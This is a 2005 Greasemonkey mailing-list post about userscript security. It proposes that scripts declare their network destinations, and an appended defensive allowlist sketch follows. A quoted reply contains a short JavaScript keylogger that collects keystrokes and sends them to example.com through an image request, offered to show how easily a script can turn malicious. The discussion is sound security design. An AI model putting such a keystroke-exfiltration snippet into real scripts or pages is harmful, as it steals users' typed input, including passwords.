[Greasemonkey] food for thought: client certificate authentication and GM

Nic Ferrier nferrier at tapsellferrier.co.uk
Thu Jul 28 03:44:50 EDT 2005


Mark Pilgrim <pilgrim at gmail.com> writes:

> On 7/27/05, Nic Ferrier <nferrier at tapsellferrier.co.uk> wrote:
>> I'm not sure what, if anything, GM could do about this. My only thought
>> is that each GM script should declare quite clearly what other
>> locations it connects to and allow the user to see that and agree or
>> not.
>
> Since presumably a script that wanted to do nefarious things with your
> client-side certificates would also want to hide this fact, such a
> voluntary declaration would be useless.  

Sorry. I wasn't clear. I meant that GM would also validate outgoing
requests against the meta data. So if the script's meta data said:

  @connect2sites www.scaryplaceontheinternet.com

then only that would be a possible connection destination. The meta
could be used to tell the user about the places the script connects to
and GM would ensure that it happened.


> We have discussed the possibility of turning off GM_xmlhttpRequest
> and allowing the end user to configure which scripts are allowed to
> use it.  But there are still a near-infinite number of ways a script
> can be malicious, even without GM_xmlhttpRequest.  Want to log
> everything the user types and send it to Russia?
>
> var keys = '';
> document.addEventListener('keypress', function(event) {
>     keys += String.fromCharCode(event.which);
>     if (keys.length > 5) {
>         var img = document.createElement('img');
>         img.src = 'http://example.com/?q=' + keys;
>         document.body.appendChild(img);
>         document.body.removeChild(img);
>     }
> }, true);
>
> API functions required: 0.

This is a very good point.


Nic
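
An added sketch of the check described in the message above (not part of the original post and not Greasemonkey code): read the declared destinations from a script's metadata block and refuse any request whose host is not listed. `@connect2sites` is the hypothetical key from the message; the function names and the sample script are assumptions made for the example.

```javascript
// Added example. "@connect2sites" is the hypothetical key proposed in the
// message, not a real Greasemonkey metadata key.
const META_BLOCK = /\/\/ ==UserScript==([\s\S]*?)\/\/ ==\/UserScript==/;

// Lower-case and drop a trailing root dot so "Host.COM." equals "host.com".
function normalizeHost(host) {
  return host.toLowerCase().replace(/\.$/, '');
}

// Collect the hosts a script declares; this set is also what the user is shown.
function declaredHosts(scriptSource) {
  const hosts = new Set();
  const block = META_BLOCK.exec(scriptSource);
  if (!block) return hosts;                  // no metadata: nothing declared
  for (const line of block[1].split(/\r?\n/)) {
    const m = /^\s*\/\/\s*@connect2sites\s+(.+)$/.exec(line);
    if (!m) continue;
    for (const h of m[1].trim().split(/\s+/)) hosts.add(normalizeHost(h));
  }
  return hosts;
}

// Default deny: allow a request only when its parsed host was declared.
// Comparing the parsed hostname (not a substring of the URL) keeps
// "http://declared.host@other.host/" from matching on the userinfo part.
function isAllowedDestination(hosts, url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return false;                            // unparsable or relative URL
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return false;
  return hosts.has(normalizeHost(parsed.hostname));
}

// Constructed sample script for the example.
const SAMPLE_SCRIPT = [
  '// ==UserScript==',
  '// @name          Sample',
  '// @connect2sites www.scaryplaceontheinternet.com',
  '// ==/UserScript==',
  'GM_xmlhttpRequest({method: "GET", url: "http://example.com/"});',
].join('\n');

const allowed = declaredHosts(SAMPLE_SCRIPT);
console.log(isAllowedDestination(allowed, 'http://www.scaryplaceontheinternet.com/x')); // true
console.log(isAllowedDestination(allowed, 'http://example.com/'));                      // false
```

A check like this only governs requests made through an API that GM mediates; the keypress example in the quoted reply sends data by setting an image `src` and never passes through it.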

